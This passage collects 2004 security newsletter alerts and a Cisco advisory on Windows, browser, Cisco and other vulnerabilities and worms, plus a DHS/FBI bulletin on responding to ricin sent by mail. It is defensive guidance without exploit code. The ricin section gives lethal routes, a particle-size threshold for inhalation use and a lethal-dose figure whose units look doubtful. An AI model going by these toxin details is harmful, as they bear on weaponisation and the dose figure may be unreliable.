windows of different domains from sharing information. The second
vulnerability involves performing a drag-and-drop operation with
function pointers during dynamic HTML (DHTML) events in IE. This
vulnerability could permit a file to be saved in a target location on
the user's system if the user clicked a link. The third vulnerability
involves the incorrect parsing of URLs that contain special
characters. When combined with a misuse of the basic authentication
feature that puts "username:password@" at the beginning of a URL, this
vulnerability could result in a misrepresentation of the URL in the
address bar of an IE window.
   Microsoft has released security bulletin MS04-003, "Cumulative
Security Update for Internet Explorer (832894)," to address these
vulnerabilities and recommends that affected users immediately apply
the appropriate patch listed in the bulletin.
   http://secadministrator.com/articles/index.cfm?articleid=41698

For complete details about these vulnerabilities, as well as links to
patches, be sure to visit our Web site at the provided URL.

Title:  Guidance for Response to Ricin Delivered by Mail
DHS Information Bulletin
Date:  February 9, 2004

DHS intends to update this Bulletin should it receive additional relevant
information, including information provided to it by the recipients.  Based
on this notification, no change to the Homeland Security Advisory System
(HSAS) level is anticipated; the current HSAS level is YELLOW.

OVERVIEW

This is a joint DHS and FBI Information Bulletin. DHS Information Bulletins
communicate issues that pertain to the critical national infrastructure and
are for informational purposes only.

While DHS possesses no information indicating specific terrorist targeting
of U.S. critical infrastructures through the delivery by mail of the toxin
ricin, such targeting would be consistent with certain terrorists' stated
objectives to disrupt and undermine vital economic interests in this
country.

DETAILS

On the afternoon of February 2, 2004, Senate staff observed gray granular
powder on an automated mail opening system.  Preliminary field tests
indicated the possible presence of a biological toxin. Samples of the
material were tested overnight at a government laboratory and results
indicated the presence of ricin. The three Senate Office Buildings were
closed and secured on February 3rd.  The samples were forwarded to the
Centers for Disease Control and Prevention in Atlanta, Georgia and on
February 4th three out of the four samples tested positive.  At this time no
threat letter has been identified and no threat has been received.

Past incidents involving the presence of ricin have occurred in the United
Sates and the United Kingdom. On October 15, 2003, a postal worker
discovered a business-size envelope containing the toxin ricin in a mail
distribution facility in Greenville, South Carolina.  The letter, which was
addressed to the U.S. Department of Transportation, did not pass through the
postal system.  In January 2003, law enforcement agencies in the United
Kingdom searched several locations in London as part of an ongoing
counterterrorism investigation and found small amounts of ricin, as well as
equipment that could be used in its production.  In April 1991, several
members of a domestic extremist group in Minnesota extracted ricin from
castor beans and discussed using it against federal law enforcement
officers.  The amount of ricin produced could have killed more than 100
people if effectively delivered.


Background on Ricin

Ricin is a poison that can be made from the waste (mash) left over from
processing castor beans. Ricin can be made in the form of an off-white
powder, a mist, or a pellet or it can be dissolved in water or weak acid. It
would take a deliberate act to make Ricin and use it to poison people. Ricin
is one of several toxins that exert toxicity by inhibiting protein
synthesis. Ricin can enter the body through inhalation, ingestion, abraded
(non-intact) skin, mucosal membranes (e.g., eyes and nose), and injection.
Ricin poisoning is not contagious, and person-to-person transmission does
not occur.

Toxicity

Exposure to ricin may occur through:

  a.. Inhalation, skin, or eye contact: as an aerosol, powder, or dust
  b.. Ingestion: through contamination of food, water, or consumer products
  c.. Injection: directly through the skin
Ricin toxicity and lethality can vary by dose and route of exposure.  In
animal studies, inhalation and intravenous injection have been shown as the
most lethal routes.  The lethal dose for humans, by inhalation or injection,
is estimated to be 5 - 10 mg/kg.  Because the ricin protein is large, it is
not well absorbed orally or through the skin.

To date ricin poisonings have only occurred in humans after ingestion or
injection.  Ricin is considered to be a much more potent toxin when inhaled
or injected compared with other routes of exposure, however ricin would need
to be dispersed in particles smaller than 5 microns to be used as an
effective weapon via inhalation.  It is technologically difficult to produce
ricin particles of this size and purity.



For more information about ricin go to: http://www.bt.cdc.gov/agent/ricin/

SUGGESTED PROTECTIVE MEASURES

Suggested Actions for Mail Room, Postal and Shipping Facility Operators

Two categories of actions are necessary[1]:

1) Identifying and assessing biological (including ricin) threats;

2) Managing biological threats that appear credible.



1. Identifying and Assessing Biological Threats

Several commercial handheld or test-strip ricin detection devices are
available; however the Centers for Disease Control and Prevention (CDC) have
stated that the performance of these assays is unknown.  While many of these
tests indicate a high false positive, they may be more useful in ruling out
the presence of ricin.  These test kits should only be used by trained and
certified hazardous materials professionals.  If such testing is deemed
necessary, personnel should preserve original evidence for forensic
analysis.  Automated, continuously monitoring bio-detection systems are
available commercially; however they may be cost-prohibitive for many
companies.



Measures that can be taken without installing special detection equipment
are the same for most biological threats and are organized according to
whether the mail is opened or unopened and whether it contains a written
threat or an unidentified container:



Opened mail that is leaking a suspicious liquid or powder, or mail that has
a suspicious odor:  If you open a letter or package and see an unknown
material, or if an unknown material is leaking from the mail as a liquid,
powder, or odor, do not try to clean it up or otherwise disturb it.  Set the
mail down on a stable surface and call the first responder designated to
respond to this type of threat, e.g., the HAZMAT team at the local fire and
rescue department.



Opened mail that contains a written threat:  If anyone in the organization
opens a letter or package with or without powder and discovers a written
threat, such as a note that says "You have been contaminated with ricin,"
put the package or letter down on a stable surface and call the first
responder designated to deal with this type of threat.  The mail center
supervisor or the first responder must ensure that local law enforcement
authorities and the FBI local field office are notified in either of these
events.



Unopened mail:  Whenever a mail center worker identifies an unopened package
or letter as "suspicious", a mail center supervisor or specially trained
employee should examine the mail piece to confirm that it meets the
"suspicious" criteria established for the location (e.g., it is covered with
powder or appears saturated from the inside).  If confirmed, do not open it.
A supervisor or designated mail center worker who is trained to confirm the
identification must be available during all working hours.



Next, determine if the mail piece is addressed to a person who actually
works in the facility.  If so, and if the addressee can be located in a
reasonable period of time, contact the addressee and ask him or her to
identify the package.  If the addressee recognizes the package and is
certain it is not threatening, deliver it.  If the addressee does not
recognize the package, or if you cannot locate the addressee, attempt to
contact the individual listed on the return address to verify the contents
of the package.  If you successfully contact the sender of the package, ask
them to provide a description of the contents, intended addressee, and the
reason it was mailed to your location.  Provide this information to the
addressee for further verification.

If the addressee does not recognize the package, or if you cannot locate the
addressee, do not open it.  The supervisor or designated mail center worker
should call the previously designated first responder. This first responder
will be responsible for opening the package in a controlled environment and
following the appropriate protocol for evaluation of the threat.  A
"controlled environment" may be a glove box, hood with negative airflow and
HEPA filters on the exhaust airflow, or a similar device.  When identifying
the first responder who will open suspicious letters or packages, make sure
they have a controlled environment available.

Mail that contains an unidentified secondary container:  If x-ray inspection
shows a secondary container that may contain an unknown material, or if you
open a letter or package and discover such a container, do not open or
otherwise disturb the secondary container.  Treat the secondary container as
suspicious, unopened mail.  As above, first call the addressee and see if
they can identify the container.  If he or she cannot be located, then call
in the first responder designated to open suspicious mail.

2.  Managing Biological Threats That Appear Credible

In the event that a trained first responder, after reviewing the situation,
determines that a possible biological hazard may actually be present (i.e.,
a biological agent may have been released into the workplace, or a
biological agent may be present in a package or envelope that has been
opened), the first responder should take the following steps or ensure that
these activities are performed where appropriate:



·        Turn off the ventilation system, fans or window air conditioners
for the area of potential release.

·        Turn off any high-speed mail processing equipment that may have
handled the suspicious mail piece.

·        Make sure that the suspicious substance is not disturbed by
covering it

·        Keep everyone out of any room(s) that may have been contaminated.



In addition, the first responder should immediately call local law
enforcement authorities and the FBI Field Office and ask to speak to the
Weapons of Mass Destruction (WMD) coordinator.  The FBI website is
http://www.fbi.gov. The FBI WMD coordinator will respond to the scene and
will, in conjunction with other federal, state, local, and internal experts,
conduct a threat assessment and, in conjunction with public health
officials, direct other actions to protect employees and the general public.



Suggested Actions for First Responders

Ricin should only be handled by trained and certified hazardous materials
professionals. Hazardous Materials Teams should be aware that ricin mostly
presents a particulate inhalation or splash hazard depending on the
preparation of the material. Personal protective equipment (PPE) for first
responders, including those who are decontaminating victims at the scene, is
generally determined by the Incident Commander based on the mechanism of
dispersal and whether dispersal is continuing.  Preventing droplets from
contacting broken skin or mucosal membranes (e.g., the mouth or eyes) is
important when decontaminating someone, but airborne dispersal of ricin
during decontamination is an unlikely hazard.  PPE can consist of a
chemical-resistant suit with gloves, air purifying respirator or
self-contained breathing apparatus and eye/face protection. Sampling,
seizure, or transportation of ricin should be completed only under the
authority of or in coordination with law enforcement.

Personnel who may have been exposed to ricin should wash the effected area
vigorously with soap and water. Equipment and supplies can be decontaminated
with a weak (0.5 percent) hypochlorite solution (bleach) and/or soap and
water.

Healthcare providers should report suspected or known cases of ricin
poisoning immediately to the regional poison control center (telephone,
1-800-222-1222) and to local or state public health agencies, which will
report cases to the CDC, and other federal agencies including the DHS.


DHS encourages recipients of this Information Bulletin to report information
concerning suspicious or criminal activity to local law enforcement, local
FBI's Joint Terrorism Task Force or the Homeland Security Operations Center
(HSOC).  The HSOC may be contacted at:   Phone: (202) 282-8101 or by email
at HSCenter@dhs.gov.

----------------------------------------------------------------------------
----


[1] Adapted from GSA Policy Advisory: National Guidelines for Assessing and
Managing Biological Threats in Federal Mail Facilities; December 29, 2003

_______________________________________________
Infragard_unsecured mailing list
Infragard_unsecured@listserv.infragard.org
 

Security Alert, March 3, 2004

Buffer Overflow in WinZip
iDefense reported that a buffer-overflow vulnerability in WinZip
can result in the arbitrary execution of code on the vulnerable
system. This vulnerability is a result of a flaw in the
parameter-parsing routine. WinZip will crash when it provides long
strings to certain parameters of MIME archives (.mim, .uue, .uu, .b64,
.bhx, .hqx, and .xxe extensions). WinZip has released version 9.0,
which doesn't have the buffer-overflow vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=41916

Security Alert, September 28, 2004

Multiple Vulnerabilities in Mozilla-based Web Browsers
Multiple vulnerabilities have been discovered in Mozilla, Mozilla
Firefox, and Mozilla Thunderbird, the most severe of which could
compromise a system. The vulnerabilities (discovered by Georgi
Guninski, Wladimir Palant, Gael Delalleau, Mats Palmgren, Jesse
Ruderman, Daniel Koukola, Andrew Schultz, and Harald Milz) include a
long list of problems--too many to list in this security alert! The
Mozilla organization recommends that affected users immediately
upgrade to the latest release of software. For complete details about
each of the vulnerabilities, be sure to read the article on our Web
site.
http://www.windowsitpro.com/article/articleid/43991/43991.html

Security Alert, September 30, 2004

JPEG GDI+ Trojan Horses Unleashed
Several Trojan horse programs that exploit the JPEG processing
(GDI+ API) vulnerability have been unleashed by using AOL Instant
Messenger (AIM), Usenet newsgroups, and other methods. An infected
JPEG file will typically spawn a command shell on a user's system and
then attempt to download Trojan horses and various tools for use by
the intruders. Administrators who haven't yet patched their systems
and taken other preventative measures should do so. To learn more
about the Trojan horses and preventative measures you can take, be
sure to read the following articles on our Web site:
http://www.windowsitpro.com/article/articleid/44003/44003.html
http://www.windowsitpro.com/article/articleid/44019/44019.html
http://www.windowsitpro.com/article/articleid/44001/44001.html
http://www.windowsitpro.com/article/articleid/44075/44075.html

Thank you for subscribing to Security UPDATE. Please tell your friends
about this newsletter and alert list!

This email newsletter is brought to you by Windows IT Pro,
the leading publication for IT professionals deploying Windows and
related technologies. Subscribe today.
http://www.windowsitpro.com/sub.cfm?code=wswi201x1z

Security Alert, September 17, 2004

Buffer Overrun in Microsoft JPEG Processing (GDI+)
Nick DeBaggis discovered that a buffer-overrun vulnerability in the
processing of JPEG image formats could allow remote code execution on
a vulnerable system. Any program that processes JPEG images on the
affected systems could be vulnerable to this attack, as could any
system that uses the affected programs or components. A potential
attacker who successfully exploited this vulnerability could take
complete control of an affected system. Microsoft has released
security bulletin MS04-028, "Buffer Overrun in JPEG Processing (GDI+)
Could Allow Code Execution (833987)," to address this vulnerability
and recommends that affected users immediately apply the appropriate
patch listed in the bulletin.
http://www.windowsitpro.com/article/articleid/43968/43968.html

Message Type : Security Advisory   
   
The product affected is currently NOT IN ANY PROFILE therefore a mass mailing to our entire mailing list is necessary.

Title: Cisco Security Advisory: Crafted Timed Attack Evades Cisco Security Agent Protections

URL:
http://www.cisco.com/en/US/customer/products/sw/secursw/ps5057/products_security_advisory09186a008034607c.shtml    
(available to registered users)

http://www.cisco.com/en/US/products/sw/secursw/ps5057/products_security_advisory09186a008034607c.shtml#summary
(available to non-registered users)

Posted: November 11, 2004

Summary: Cisco Security Agent (CSA) provides threat protection for server and desktop computing systems,
also known as endpoints. It identifies and prevents malicious behavior, thereby eliminating known and unknown
security risks.

A vulnerability exists in which a properly timed buffer overflow attack may evade the protections offered by CSA.
The system under attack must contain an unpatched underlying vulnerability in system software that CSA is configured
to protect. Another prerequisite for the attack is that a user must be interactively logged in during the attack.    
   
Subscribe/unsubscribe instructions :
This email has been sent to bill@kennon.net.
If you choose not to receive these notices, or if you would like to make changes to your notification profile, please go to:
http://tools.cisco.com/Support/PAT/do/ViewMyProfiles.do?local=en   

Security Alert, February 19, 2004

Arbitrary Code Execution in Microsoft Virtual PC for Mac
George Gal of @stake discovered that a vulnerability in Microsoft
Virtual PC for Mac 6.1 and 6.0 can result in the execution of
arbitrary code with system-level privileges. Microsoft has released
security bulletin MS04-005, "Vulnerability in Virtual PC for Mac could
lead to privilege elevation (835150)," to address this vulnerability
and recommends that affected users immediately apply the appropriate
patch listed in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=41748

Security Alert, May 28, 2004

ImageMap URL Spoof Vulnerability in Internet Explorer
Paul Kurczaba discovered that a vulnerability in Microsoft Internet
Explorer (IE) 5.0 and 6.0 could let a potential attacker spoof the URL
displayed in the lower left corner of the IE window by using a
specially coded image map. The discoverer posted the following code as
proof of concept and has made a demonstration available on his Web
site. Microsoft hasn't released a fix or bulletin that addresses this
vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=42732

Security Alert, September 9, 2004

Denial of Service In Cisco IOS Telnet
Cisco Systems reported that a Denial of Service (DoS) condition
exists in all Cisco Internetwork Operating System (IOS)-based products
that use Telnet or reverse Telnet. A specifically crafted TCP
connection to a Telnet or reverse Telnet port of a Cisco Systems'
device that's running IOS might block further Telnet, reverse Telnet,
remote shell (Rsh), Secure Shell (SSH), and in some cases HTTP access
to the device. Cisco Systems has released Security Advisory 61671,
"Cisco Telnet Denial of Service Vulnerability," to address the
vulnerability and recommends that affected users immediately apply the
appropriate patch that's available via normal update channels.
http://www.windowsitpro.com/article/articleid/43817/43817.html

Security Alert, September 3, 2004

Multiple Vulnerabilities in Cisco Secure Access Control Server
Cisco Systems reported several new vulnerabilities in Cisco Secure
Access Control Server, the most severe of which could let an
unauthorized user authenticate to a server. Cisco Systems has released
security advisory 61603, "Multiple Vulnerabilities in Cisco Secure
Access Control Server," which addresses these problems and recommends
that affected users immediately apply the appropriate patch listed in
the bulletin.
http://www.windowsitpro.com/article/articleid/43781/43781.html

Security Alert, August 19, 2004

Local Privilege-Escalation Vulnerability in Serv-U FTP Server
aT4r ins4n3 discovered a local privilege-escalation vulnerability
in Rhino Software's Serv-U FTP server that could result in the running
of system commands via the loopback interface. Rhino Software hasn't
released a fix for this problem.
http://www.winnetmag.com/article/articleid/43679/43679.html

Security Alert, August 2, 2004

New Microsoft Patch for IE Fixes 3 Critical Problems
Microsoft released a new patch, MS04-25 "Cumulative Security Update
for Internet Explorer (867801)," for Internet Explorer (IE) 6.01, IE
5.5, and IE 5.01 that fixes three critical problems in the browser.
The patch will help prevent such nuisances as the Download.Ject
exploit launched against IE users last month. The patch also corrects
two buffer-overflow problems. One problem involves GIF files that can
cause a buffer overflow in mshtml.dll. The other problem involves
bitmap images, where malformed bitmap images can cause a buffer
overflow.
http://www.winnetmag.com/article/articleID/43402/43402.html

Security Alert, July 19, 2004

Arbitrary Code-Execution Vulnerability in Internet Information Server 4.0
A vulnerability in Microsoft Internet Information Server (IIS) 4.0
could result in arbitrary remote code execution and remote compromise
of the vulnerable system. This vulnerability is a result of a
buffer-overflow condition in the redirect function. Micosoft has
released bulletin MS04-021, "Security Update for IIS 4.0 (841373)," to
address this vulnerability and recommends that affected users apply
the appropriate patch listed in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=43272

Security Alert, June 21, 2004

Denial of Service in Microsoft DirectPlay
John Lampe of Tenable Network Security discovered a Denial of
Service (DoS) vulnerability in the IDirectPlay4 API of Microsoft
DirectPlay, which stems from a lack of robust packet validation.
Microsoft has released bulletin MS04-016, "Vulnerability in DirectPlay
Could Allow Denial of Service" (839643), to address this vulnerability
and recommends that affected users apply the appropriate patch listed
in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=42934

Security Alert, August 18, 2004

Denial of Service in Sygate Secure Enterprise
Martin O'Neal discovered a Denial of Service (DoS) condition that
exists in Sygate Secure Enterprise 3.5 and earlier. Sygate Secure
Enterprise uses HTTP to communicate with the Sygate Security Agent
clients. These exchanges don't implement any form of replay
protection, so an attacker can simply send repeated requests until all
the resources on the host are exhausted. The vendor, Sygate, has
released a fix for this problem--version 3.5MR3.
http://www.winnetmag.com/article/articleid/43673/43673.html

Security Alert, August 5, 2004

Remote-Compromise Vulnerability in Check Point VPN-1 Gateway
Internet Security Systems discovered that a buffer-overrun
vulnerability can allow remote compromise of a Check Point VPN-1
gateway. An Internet Security Association and Key Management Protocol
(ISAKMP) problem affects Check Point VPN-1 products during
negotiations of a VPN tunnel. When the VPN-1 server performs Abstract
Syntax Notation One (ASN.1) decoding, an attacker can trigger an
arbitrary-length heap overflow, which might result in complete
compromise of the VPN-1 server. Check Point has released "ASN.1 Alert"
to address this vulnerability and recommends that affected users
immediately apply the appropriate patch listed in the bulletin.
http://www.winnetmag.com/article/articleid/43414/43414.html

Security Alert, July 28, 2004

New MyDoom Worm Variant Is Spreading
A new MyDoom worm variant, MyDoom.M@mm, was discovered July 26.
Computers affected by the worm are used to perform queries on various
search engines to harvest email addresses. The worm collects email
addresses from a user's system by parsing various files, then spreads
by using its own built-in SMTP engine to email copies of itself to
harvested email addresses. MyDoom.M@mm tries to hide on an infected
system by installing itself using the filenames java.exe and
services.exe, both of which are placed in the Windows root directory.
The java.exe file is the worm itself, and the services.exe file is a
backdoor Trojan program that antivirus software might detect as
Backdoor.Zincite.A. The Trojan opens port 1034 for remote connections
and probes IP addresses for other systems that are listening on port
1034. For more information about the new worm, read the article on our
Web site and visit your antivirus vendor of choice for virus signature
updates.
http://www.winnetmag.com/article/articleID/43365/43365.html

Security Alert, August 9, 2004

Information-Disclosure Vulnerability in FTP GLIDE Client 2.43
Global Security Solution IT discovered a vulnerability in the
client version of FTP GLIDE 2.43 that can result in information
disclosure. FTP GLIDE stores passwords in clear text, so that any user
can view them. FTP GLIDE stores its login data at \program
files\FTPGlide\[Profile Name].ftp. The vendor, Innovative Technology
Consulting, LLC, has been notified but hasn't released a fix for the
problem. In the meantime, you should set permissions on the directory
accordingly.
http://www.winnetmag.com/article/articleID/43415/43415.html

Security Alert, August 13, 2004

Cross-Site Scripting and Spoofing Vulnerability in Exchange 5.5 SP4 with OWA
A cross-site scripting and spoofing vulnerability in Microsoft
Exchange Server 5.5 Service Pack 4 (SP4) could let an attacker
convince a Microsoft Outlook Web Access (OWA) user to run a malicious
script. This vulnerability could let an attacker access any data on
the OWA server that the user could access. Microsoft has released
bulletin MS04-026, "Vulnerability in Exchange Server 5.5 Outlook Web
Access Could Allow Cross-Site Scripting and Spoofing Attacks
(842436)," to address this vulnerability and recommends that affected
users apply the appropriate patch listed in the bulletin.
http://www.winnetmag.com/article/articleid/43653/43653.html

Security Alert, June 24, 2004

Denial of Service in WinAgents TFTP Server for Windows
Global Security Solution IT discovered that a Denial of Service
(DoS) condition exists in WinAgents Software Group's TFTP Server for
Windows. By requesting a file with an overly long filename string, a
potential attacker can cause the system to crash, resulting in a
remote DoS condition. WinAgents Software Group has been notified but
hasn't released a patch or workaround for this vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=43034

Security Alert, February 15, 2005

Vulnerability in PNG Processing Could Allow Remote Code Execution
Vulnerabilities exist because of the way the affected software handles PNG files. A remote intruder could use malicious Web content that contains corrupt or malformed PNG files to execute code on the affected system. A successful exploit could allow the intruder to take complete control of the system. Microsoft has released Security Bulletin MS05-009, "Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2053:28C14

Vulnerability in the License Logging Service Could Allow Code Execution
A vulnerability exists in the License Logging service that could allow a remote intruder to execute code on a user's system. A successful exploit could allow the intruder to take complete control of the user's system. Microsoft has released Security Bulletin MS05- 010, "Vulnerability in the License Logging Service Could Allow Code Execution (885834)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2052:28C14

Server Message Block Could Allow Remote Code Execution
A vulnerability exists in Server Message Block (SMB) that could allow a remote intruder to take complete control of a user's system.
Microsoft has released Security Bulletin MS05-011, "Vulnerability in Server Message Block Could Allow Remote Code Execution (885250)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2051:28C14

Vulnerability in OLE and COM Could Allow Remote Code Execution
A vulnerability in the way memory is accessed when processing COM- based storage files could allow the locally logged on user to take complete control of the OS. A vulnerability in the way OLE processes input validation could allow a remote intruder to execute code on a user's system. A successful exploit could allow the intruder to take complete control of the user's system. Microsoft has released Security Bulletin MS05-012, "Vulnerability in OLE and COM Could Allow Remote Code Execution (873333)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2050:28C14

Security Alert, October 19, 2004
Arbitrary Code Execution in Microsoft Excel
Brett Moore discovered that a vulnerability in Microsoft Excel
could result in the arbitrary execution of code on the affected
system. This vulnerability is a result of an unchecked buffer. A
potential attacker who successfully exploited the vulnerability could
take complete control of an affected system. Microsoft has released
bulletin MS04-033, "Vulnerability in Microsoft Excel Could Allow
Remote Code Execution (886836)," to address this vulnerability and
recommends that affected users apply the appropriate patch listed in
the bulletin.
http://www.windowsitpro.com/article/articleid/44265/44265.html

Arbitrary Code Execution in Windows
Brett Moore, eEye Digital Security, Patrick Porlan, and "hlt"
discovered four vulnerabilities in various versions of Windows
that can result in the arbitrary execution of code on the affected system.
These vulnerabilities exist in the Window management system, Virtual
DOS Machine (VDM), Graphics Rendering Engine, and the Windows kernel.
Microsoft has released bulletin MS04-032, "Security Update for
Microsoft Windows (840987)," to address these vulnerabilities and
recommends that affected users apply the appropriate patch listed in
the bulletin.
http://www.windowsitpro.com/article/articleid/44264/44264.html

6/23/04
Denial of Service in Cisco IOS
A Cisco Systems' device running Internetwork Operating System (IOS)
and enabled for the Border Gateway Protocol (BGP) is vulnerable to a
Denial of Service (DoS) attack from a malformed BGP packet. By sending
a malformed BGP packet to the device, a potential attacker could cause
the device to reload. Cisco Systems has released Security Advisory
50321, "Cisco IOS Malformed BGP Packet Causes Reload," to address this
vulnerability and recommends that affected users immediately apply the
appropriate patch listed in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=43035

Security Alert, July 2, 2004

Cross-Site Scripting Vulnerability in Cart32
Dr. Ponidi discovered that McMurtrey/Whitaker & Associates' Cart32
contains a cross-site scripting vulnerability that could let a
potential remote attacker insert third-party content in a Web site.
The vendor hasn't released a fix for this vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=43119

Security Alert, July 16, 2004

Arbitrary Code-Execution Vulnerability in Mozilla
Keith McCanless discovered a vulnerability in Windows-based versions
of Mozilla products that involves the use of the shell: scheme Uniform
Resource Identifiers (URIs), which are passed to the OS for handling.
The effects of the vulnerability depend on the version of Windows, but
on Windows XP it's possible to launch executables in known locations
or the default handlers for file extensions. An attacker could combine
this effect with a known buffer overrun in any of the affected Mozilla
programs to create a remote execution exploit. The Mozilla Foundation
has released the security bulletin "What Mozilla users should know
about the shell: protocol security issue," which addresses this
vulnerability, and recommends that affected users immediately apply
the appropriate patch listed in the bulletin or upgrade to the latest
software release.
http://secadministrator.com/articles/index.cfm?articleid=43263

Security Alert, November 22, 2004

Denial of Service in Cisco IOS 
Cisco Systems reported a Denial of Service (DoS) vulnerability in
its Cisco IOS devices that run branches of IOS version 12.2S and that
have a DHCP server or relay agent enabled. Certain crafted DHCP
packets might be undeliverable but will remain in the queue instead of
being dropped. If so many packets are sent that they equal the size of
the input queue, no more traffic will be accepted on that interface,
resulting in a DoS condition. Cisco Systems has released Cisco
Security Advisory "Cisco IOS DHCP Blocked Interface Denial-of-Service"
to address this vulnerability.
http://www.windowsitpro.com/article/articleid/44565/44565.html

Security Alert, July 23, 2004

Privilege-Elevation Vulnerability in Windows POSIX OS Subsystem